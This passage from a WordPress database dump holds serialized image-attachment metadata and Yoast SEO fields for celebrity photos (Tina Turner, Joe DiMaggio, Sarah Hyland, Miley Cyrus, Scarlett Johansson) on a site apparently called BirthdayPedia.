\"td_80x60\";a:4:{s:4:\"file\";s:21:\"tina-turner-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"tina-turner-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"tina-turner-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"tina-turner-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"tina-turner-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"tina-turner-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"tina-turner-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"tina-turner-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"tina-turner-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"tina-turner-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"tina-turner-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:23:\"tina-turner-696x626.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:626;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"tina-turner-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:23:\"tina-turner-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"tina-turner-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:24:\"tina-turner-1068x960.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"tina-turner-467x420.jpg\";s:5:\"width\";i:467;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"12\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"P 45+\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1209492522\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"80\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.00249975080809\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3585,567,'_yoast_wpseo_focuskw_text_input','Tina Turner'),(3586,567,'_yoast_wpseo_content_score','30'),(3587,590,'_wp_attached_file','2015/11/tina-turner1.jpg'),(3588,590,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1187;s:6:\"height\";i:755;s:4:\"file\";s:24:\"2015/11/tina-turner1.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tina-turner1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tina-turner1-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"tina-turner1-768x488.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"tina-turner1-1024x651.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"tina-turner1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"tina-turner1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"tina-turner1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"tina-turner1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"tina-turner1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"tina-turner1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"tina-turner1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"tina-turner1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"tina-turner1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"tina-turner1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"tina-turner1-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:24:\"tina-turner1-696x443.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:443;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"tina-turner1-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"tina-turner1-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"tina-turner1-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:25:\"tina-turner1-1068x679.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"tina-turner1-660x420.jpg\";s:5:\"width\";i:660;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"18\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"P 45+\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1209499452\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"80\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.00249975080809\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3589,591,'_wp_attached_file','2015/11/joe-dimaggio.jpg'),(3590,591,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2015/11/joe-dimaggio.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"joe-dimaggio-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"joe-dimaggio-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-281x160.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-281x235.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-281x220.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio-281x261.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:12:\"idimagg001p1\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:12:\"idimagg001p1\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3591,566,'_yoast_wpseo_focuskw_text_input','Joe DiMaggio'),(3592,566,'_yoast_wpseo_content_score','90'),(3593,593,'_wp_attached_file','2015/11/joe-dimaggio1.jpg'),(3594,593,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:391;s:4:\"file\";s:25:\"2015/11/joe-dimaggio1.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"joe-dimaggio1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"joe-dimaggio1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-324x391.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-534x391.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"joe-dimaggio1-550x385.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3595,595,'_wp_attached_file','2015/11/sarah-hyland.jpg'),(3596,595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1402;s:6:\"height\";i:1969;s:4:\"file\";s:24:\"2015/11/sarah-hyland.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"sarah-hyland-768x1079.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1079;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"sarah-hyland-729x1024.jpg\";s:5:\"width\";i:729;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"sarah-hyland-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"sarah-hyland-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-696x977.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:977;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"sarah-hyland-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:26:\"sarah-hyland-1068x1500.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:1500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"sarah-hyland-299x420.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3597,564,'_yoast_wpseo_focuskw_text_input','Sarah Hyland'),(3598,564,'_yoast_wpseo_content_score','90'),(3601,598,'_wp_attached_file','2015/11/miley-cyrus.jpg'),(3602,598,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:23:\"2015/11/miley-cyrus.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"miley-cyrus-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"miley-cyrus-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"miley-cyrus-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-696x392.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:392;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"miley-cyrus-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:24:\"miley-cyrus-1068x601.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:601;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"miley-cyrus-747x420.jpg\";s:5:\"width\";i:747;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3603,560,'_yoast_wpseo_focuskw_text_input','Miley Cyrus'),(3604,560,'_yoast_wpseo_content_score','90'),(3605,20,'_yoast_wpseo_focuskw_text_input','BirthdayPedia'),(3606,20,'_yoast_wpseo_content_score','60'),(3607,602,'_wp_attached_file','2015/11/Scarlett-Johansson.jpg'),(3608,602,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:620;s:6:\"height\";i:900;s:4:\"file\";s:30:\"2015/11/Scarlett-Johansson.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:28:\"Scarlett-Johansson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:29:\"Scarlett-Johansson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-620x385.jpg\";s:5:\"width\";i:620;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-620x486.jpg\";s:5:\"width\";i:620;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:30:\"S